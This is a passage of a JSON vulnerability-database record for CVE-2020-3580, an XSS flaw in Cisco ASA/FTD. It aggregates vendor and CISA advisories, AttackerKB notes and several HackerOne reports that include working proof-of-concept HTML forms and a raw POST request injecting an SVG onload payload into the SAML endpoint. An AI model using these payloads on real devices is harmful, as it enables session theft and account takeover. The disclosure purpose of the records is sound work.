"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21999"], "modified": "2021-06-23T00:00:00", "id": "ZDI-21-754", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-754/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-08-13T16:54:28", "description": "<h1 align=\"center\">\n <br>\n CVE-2020-3580 Automated Scanner \n</h...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-28T06:51:26", "type": "githubexploit", "title": "Exploit for Cross-site Scripting in Cisco Firepower Threat Defense", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2022-08-13T16:36:28", "id": "83C1EA82-471C-5783-8685-73DB774CDE06", "href": "", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:12", "description": "A cross site scripting vulnerability exists in Cisco Adaptive Security Appliance. Successful exploitation of this vulnerability would allow remote attackers to inject an arbitrary web script into the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-07-15T00:00:00", "type": "checkpoint_advisories", "title": "Cisco Adaptive Security Appliance Cross Site Scripting (CVE-2020-3580)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-07-15T00:00:00", "id": "CPAI-2020-3375", "href": "", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}], "hackerone": [{"lastseen": "2023-02-03T02:27:22", "bounty": 0.0, "description": "Hello Team,\nDuring my research, I found the following host to be vulnerable to CVE 2020-3580 which is POST BASED XSS.\n\nVulnerable URL: https://\u2588\u2588\u2588\u2588\u2588/+CSCOE+/saml/sp/acs?tgname=a\n\n## Impact\n\nAttackers can steal cookies and even takeover accounts and perform different malicious activities.\n\n## System Host(s)\n\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nSave Following code as xss.html and open in any browser:\n<html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action=\"https://\u2588\u2588\u2588/+CSCOE+/saml/sp/acs?tgname=a\" method=\"POST\">\n <input type=\"hidden\" name=\"SAMLResponse\" value=\"&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;&apos;XSS&apos;&#41;&gt;\" />\n <input type=\"hidden\" name=\"\" value=\"\" />\n <input type=\"submit\" value=\"Submit request\" />\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>\n\n## Suggested Mitigation/Remediation Actions\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-26T11:36:25", "type": "hackerone", "title": "U.S. Dept Of Defense: XSS DUE TO CVE-2020-3580", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-07-29T19:45:44", "id": "H1:1245048", "href": "https://hackerone.com/reports/1245048", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T02:27:20", "bounty": 0.0, "description": "Hello Team,\nDuring my research, I found the following host to be vulnerable to CVE 2020-3580 which is POST BASED XSS.\n\nVulnerable URL: https://\u2588\u2588\u2588\u2588/+CSCOE+/saml/sp/acs?tgname=a\n\n## Impact\n\nAttackers can steal cookies and even takeover accounts and perform different malicious activities.\n\n## System Host(s)\n\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nSave following code as xss.html and open in browser:\n<html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action=\"https://\u2588\u2588\u2588/+CSCOE+/saml/sp/acs?tgname=a\" method=\"POST\">\n <input type=\"hidden\" name=\"SAMLResponse\" value=\"&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;&apos;XSS&apos;&#41;&gt;\" />\n <input type=\"hidden\" name=\"\" value=\"\" />\n <input type=\"submit\" value=\"Submit request\" />\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>\n\n## Suggested Mitigation/Remediation Actions\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-26T11:42:33", "type": "hackerone", "title": "U.S. Dept Of Defense: XSS DUE TO CVE-2020-3580", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-07-29T19:46:20", "id": "H1:1245055", "href": "https://hackerone.com/reports/1245055", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T02:27:12", "bounty": 0.0, "description": "Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. \n\n Steps To Reproduce \n\n Go to this URL \n\n \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.mil.html \n\n HTML POC:\n \n <html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action='https://'\u2588\u2588\u2588.mil'/+CSCOE+/saml/sp/acs?tgname=a' method='POST'>\n <input type='hidden' name='SAMLResponse' value='&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;document&#46;cookies&#41;&gt;'/>\n </form>\n <script>\n document.forms[0].submit();\n</script>\n</body>\n</html>\n\n## Impact\n\n- An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link.\n - A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. \n\n Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations.\n\n Supporting Material References\n https://www.exploit-db.com/exploits/47988\n https://twitter.com/sagaryadav8742/status/1275170967527006208", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-25T20:31:41", "type": "hackerone", "title": "U.S. Dept Of Defense: XSS due to CVE-2020-3580 [\u2588\u2588\u2588.mil]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-08-19T19:04:13", "id": "H1:1277383", "href": "https://hackerone.com/reports/1277383", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T02:25:03", "bounty": 0.0, "description": "Hello Team,\nDuring my research, I found multiple hosts to be vulnerable to Cisco ASA XSS CVE-2020-3580, This vulnerability targets the saml service within the VPN. It is triggered via a POST request to domain/+CSCOE+/saml/sp/acs?tgname=a\n\n## References\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n\n## Impact\n\nWith this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\nCisco ASA\n\n## CVE Numbers\nCVE-2020-3580\n\n## Steps to Reproduce\n<html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action=\"https://\u2588\u2588\u2588\u2588/+CSCOE+/saml/sp/acs?tgname=a\" method=\"POST\">\n <input type=\"hidden\" name=\"SAMLResponse\" value=\"&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;&apos;XSS&apos;&#41;&gt;\" />\n <input type=\"hidden\" name=\"\" value=\"\" />\n <input type=\"submit\" value=\"Submit request\" />\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>\n\n## Suggested Mitigation/Remediation Actions\nPatch Cisco ASA : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-06-18T19:23:56", "type": "hackerone", "title": "U.S. Dept Of Defense: XSS DUE TO CVE-2020-3580", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2022-09-06T18:55:29", "id": "H1:1606068", "href": "https://hackerone.com/reports/1606068", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T02:27:02", "bounty": 0.0, "description": "Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. \n\n Steps To Reproduce \n\n Go to this URL \n\n http://www.info-sec.cl/post-xss-\u2588\u2588\u2588.html \n\n HTML POC:\n \n <html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action='https://'\u2588\u2588\u2588\u2588\u2588\u2588'/+CSCOE+/saml/sp/acs?tgname=a' method='POST'>\n <input type='hidden' name='SAMLResponse' value='&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;document&#46;cookies&#41;&gt;'/>\n </form>\n <script>\n document.forms[0].submit();\n</script>\n</body>\n</html>\n\n## Impact\n\n- An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link.\n - A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. \n\n Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations.\n\n Supporting Material References\n https://www.exploit-db.com/exploits/47988\n https://twitter.com/sagaryadav8742/status/1275170967527006208", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-25T20:32:45", "type": "hackerone", "title": "U.S. Dept Of Defense: XSS due to CVE-2020-3580 [\u2588\u2588\u2588]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-09-09T19:57:12", "id": "H1:1277389", "href": "https://hackerone.com/reports/1277389", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T02:27:02", "bounty": 0.0, "description": "Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. \n\n Steps To Reproduce \n\n Go to this URL \n\n http://www.info-sec.cl/post-xss-\u2588\u2588\u2588\u2588\u2588\u2588\u2588.html \n\n HTML POC:\n \n <html>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action='https://'\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588'/+CSCOE+/saml/sp/acs?tgname=a' method='POST'>\n <input type='hidden' name='SAMLResponse' value='&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;document&#46;cookies&#41;&gt;'/>\n </form>\n <script>\n document.forms[0].submit();\n</script>\n</body>\n</html>\n\n## Impact\n\n- An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link.\n - A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. \n\n Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations.\n\n Supporting Material References\n https://www.exploit-db.com/exploits/47988\n https://twitter.com/sagaryadav8742/status/1275170967527006208", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-07-25T20:33:02", "type": "hackerone", "title": "U.S. Dept Of Defense: XSS due to CVE-2020-3580 [\u2588\u2588\u2588\u2588\u2588\u2588]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-09-09T19:56:21", "id": "H1:1277392", "href": "https://hackerone.com/reports/1277392", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-02-03T02:26:56", "bounty": 0.0, "description": "\u2588\u2588\u2588\u2588 appears to be affected by the Cisco ASA XSS CVE-2020-3580, This vulnerablity is targets the saml service within the VPN. It is triggered via a POST request to /+CSCOE+/saml/sp/acs?tgname=a\n\n## References\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n\n## Impact\n\nWith this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website.\n\n## System Host(s)\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\nCisco ASA\n\n## CVE Numbers\nCVE-2020-3580\n\n## Steps to Reproduce\nsend a POST request from browser: \n\nPOST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\nConnection: close\nsec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"\nsec-ch-ua-mobile: ?0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nContent-Length: 40\n\nSAMLResponse=\"><svg/onload=alert('xss')>\n\n## Suggested Mitigation/Remediation Actions\nPatch Cisco ASA : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-06-24T21:34:35", "type": "hackerone", "title": "U.S. Dept Of Defense: \u2588\u2588\u2588\u2588\u2588\u2588\u2588 - XSS - CVE-2020-3580", "bulletinFamily": "bugbounty", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-09-29T17:44:43", "id": "H1:1243650", "href": "https://hackerone.com/reports/1243650", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Cisco ASA and FTD XSS Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-3580", "href": "", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}], "attackerkb": [{"lastseen": "2023-03-04T17:20:04", "description": "Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.\n\n \n**Recent assessments:** \n \n**MadDud** at June 25, 2021 12:48pm UTC reported:\n\nProof of Concept of the XSS attack is publicly available.\n\nThis is an XSS attack, which doesn\u2019t require authentication to plant the code, but it requires user interaction (visit something in web interface) to trigger it.\n\nOriginal tweet: <https://twitter.com/ptswarm/status/1408050644460650502> \nCopy of tweet (screenshot) and analysis <https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>\n\n**ccondon-r7** at June 25, 2021 8:24pm UTC reported:\n\nProof of Concept of the XSS attack is publicly available.\n\nThis is an XSS attack, which doesn\u2019t require authentication to plant the code, but it requires user interaction (visit something in web interface) to trigger it.\n\nOriginal tweet: <https://twitter.com/ptswarm/status/1408050644460650502> \nCopy of tweet (screenshot) and analysis <https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-10-21T00:00:00", "type": "attackerkb", "title": "CVE-2020-3580", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3187", "CVE-2020-3580"], "modified": "2020-10-29T00:00:00", "id": "AKB:6D848E58-548B-45BE-A600-D0B5780BEB50", "href": "https://attackerkb.com/topics/ELL5aQv129/cve-2020-3580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisco": [{"lastseen": "2023-01-24T06:15:58", "description": "Update June 28, 2021: Cisco has become aware that public exploit code exists for CVE-2020-3580, and this vulnerability is being actively exploited.\n\nMultiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device.\n\nThe vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information.\n\nNote: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products [\"#vp\"] section.\n\nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe\"]", "cvss3": {}, "published": "2020-10-21T16:00:00", "type": "cisco", "title": "Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Interface Cross-Site Scripting Vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-3580", "CVE-2020-3581", "CVE-2020-3582", "CVE-2020-3583"], "modified": "2021-06-28T15:14:27", "id": "CISCO-SA-ASAFTD-XSS-MULTIPLE-FCB3VPZE", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe", "cvss": {"score": 6.1, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"}}], "avleonov": [{"lastseen": "2021-07-28T14:34:07", "description": "Hello, today I want to experiment with a new format. I will be reading last week&#x27;s news from my [@avleonovnews](<https://t.me/avleonovnews>) channel, which I found the most interesting. I do this mostly for myself, but if you like it too, then that would be great. Please subscribe to [my 